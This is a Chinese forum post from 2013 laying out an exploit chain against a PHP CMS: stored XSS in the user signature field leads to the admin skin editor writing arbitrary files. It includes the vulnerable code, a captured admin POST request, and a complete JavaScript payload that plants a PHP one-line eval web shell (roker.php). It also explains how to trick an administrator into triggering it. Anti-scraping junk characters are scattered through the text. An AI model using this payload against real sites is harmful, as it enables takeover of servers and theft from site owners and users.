|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
3 B2 [* I8 p* b" g官网已经修补了,所以重新下了源码1 v( c. {8 P* |4 q7 p" S
因为 后台登入 还需要认证码 所以 注入就没看了。
0 {7 R9 [! G$ F" e2 _7 l, j存在 xss" ~, {2 x* }3 N5 ~3 b
漏洞文件 user/member/skin_edit.php; t. N: `- P( J' _2 Q' j1 s
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:7 h# q' z3 o) M9 e E9 B
& u7 N: S. n5 ]- b4 M
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>7 _3 |/ _* q# j! P5 j
# j: l. \6 N0 F1 o# f
</textarea></td></tr>
5 s# h4 q& C$ P7 j% ^" ]* P! E7 a
8 B6 i1 s* o' K; `+ t user/do.php
3 a6 D& F4 v: r: k( `3 Y
8 J7 C' r$ f# E! |7 {' \3 u
) O3 J% C- z4 P- W$ ]: F/ I* @if($op=='zl'){ //资料
+ W, j9 l; T$ K0 n& B) K. p7 `6 l
" t( V( N3 G) u- \* ` if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
) J8 e1 n, A% }7 M; _ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
! U c& D/ E" @, H1 ?
' @4 N: [* M; G7 x $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',* \1 N3 \. G8 F- Q, W; I
/ ~8 V+ R$ D5 d8 z' z; r
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- A* D4 }/ u! f3 Y$ V
where CS_Name='".$cscms_name."'";
$ [! { c; h# ~* M
- ^6 N; b5 t9 X" ]: _* O* k1 z if($db->query($sql)){
% n0 Y6 o8 g4 `, K4 ?7 K) e5 z % v6 E9 P9 k+ J- }; Y i
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));+ F6 \; l- ?# K
( n" T6 v7 w1 B; E' q- r }else{
! q$ s2 |: z+ P" Y) W( l
+ c4 Z7 H5 |$ |# u g7 V' ] exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));% \8 c U5 g: A1 R" _& M
# b; y; z R+ ]: v: S* { }4 E9 T8 r$ R. n& g, {3 x
: |$ B' f6 H' N3 Z* w5 z8 K! A/ l2 k) y+ ?# T! F
没有 过滤导致xss产生。
0 X6 A# q9 r, a+ g4 X3 e后台 看了下 很奇葩的是可以写任意格式文件。。: G N' y- \& X3 b3 {
抓包。。
7 Z; Q5 W9 L) ~0 U& `, u }$ [6 h+ l' f- `+ M) g
9 q0 \- e/ B' Y7 n& J$ H% ]本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.12 t7 S/ E) m O( B
1 q- ~2 l n7 \) D2 w
Accept: text/html, application/xhtml+xml, */*6 B S3 o( N0 a
- D4 }, O1 t* ~! f0 M7 SReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
9 \; q3 {6 n8 r0 f0 A% b
1 d( {( F% }9 p+ AAccept-Language: zh-CN; C$ Y [( u6 N* M
7 @+ ?' l1 e* o4 K xUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)7 e7 }1 W$ D& P) M/ a
8 s! n& G Z' D) EContent-Type: application/x-www-form-urlencoded9 K; ~: ~/ R( L! P1 H
* q( {# k) }5 {. f
Accept-Encoding: gzip, deflate
: X8 o' h& j/ s) q) |+ Q2 { 7 @4 P3 r8 R( \/ @3 t9 D
Host: 127.0.0.1
7 j0 {/ x% h: U8 k3 g. Y # p: Z q) G+ @$ h) }8 ~& G1 v
Content-Length: 38 X6 u, R# U$ ]: ^; O' @
4 l# ~; H1 B2 K. Y JDNT: 1+ r7 v3 |) L. M- U) H, \6 e
2 ?+ z- L }4 _) D: | {) m
Connection: Keep-Alive q$ I. O/ e T( _2 G: c% L" k; g
2 q5 ]% }5 w. R2 M5 nCache-Control: no-cache. s1 S8 Y/ L* E [6 \
& z. `; [6 n/ \: @3 gCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
+ `4 H9 H* q2 k8 f* P : F% G; ^3 m0 ~ a# Q
7 v. _# D* @3 R4 E
name=aaa.php&content=%3Cs%3E%3Ca%25%3E% c/ s0 n- X l* ~% C
8 J' I" q# P1 y$ M8 U) Z
7 n A1 _* V4 N3 I9 b/ ^
8 e6 i, k6 X/ Q, k* e+ I4 v2 g于是 构造js如下。# Q; _$ v5 W, v6 I$ i, H: Z" K
. s9 Q0 X! g8 a: M7 y3 d; L- r本帖隐藏的内容<script>
8 k$ W. l9 y. A6 m) sthisTHost = top.location.hostname;& o* T. Z3 E! _/ O
2 |1 N# x f5 S# ~7 x8 _thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
* ]( } W' ?5 D7 i
: a6 r& u3 V( M- l% Zfunction PostSubmit(url, data, msg) { " c. B- g5 B5 ~ c1 b
var postUrl = url;3 s5 w# ~- l' R: b. E
/ c& E( e6 `1 H0 R
var postData = data;
7 }% X, s+ @ W! Z6 ~5 B( ? var msgData = msg; 1 P0 O& B1 I* Q! t0 U% X' r0 M
var ExportForm = document.createElement("FORM"); 8 s: @, j0 ]8 l6 c2 z
document.body.appendChild(ExportForm);
l8 {$ X0 p: Z5 ^- G4 f, Y) D: |9 o ExportForm.method = "POST";
7 ?" ]8 H6 B! K# d0 } var newElement = document.createElement("input"); + Y+ U) L% x+ g" m/ |# H
newElement.setAttribute("name", "name"); - ~% P4 @; J# S
newElement.setAttribute("type", "hidden");
. Z0 h( y# ~4 Y* j" I var newElement2 = document.createElement("input");
* B" X7 Y$ Z) E+ J newElement2.setAttribute("name", "content");
1 j# y: n, x+ P newElement2.setAttribute("type", "hidden"); ' n W; H4 y" e4 C) b7 g& i
ExportForm.appendChild(newElement);
# m; K8 l3 x, |" V ExportForm.appendChild(newElement2);
( z, \3 W6 t3 z newElement.value = postData;
2 [% K; Q7 v' V' m newElement2.value = msgData; 8 P- c2 L+ e1 q3 W" @
ExportForm.action = postUrl; " S& {* l4 c" n* i$ ?: O% c& l
ExportForm.submit(); 0 c. W) b L+ r, A8 h/ i
};
& e' J8 N! E6 Z * Y" }8 V2 N4 h m) i; y7 Q& }
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");. ]5 Q# s- _' L: y, D
% T) u+ n' {" K3 l! N: g: b
</script>* u+ K8 {6 f* N% p6 K
9 @. Q: c1 c- v4 A( [
& b( T$ G+ w% U) S! p" b( V' x
8 H0 [9 b8 {( c, ehttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
) E/ f# ]& T+ g5 `用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)1 ~! c& ^" A3 v/ F
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
, C; L8 n! x5 |0 i0 S. m
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对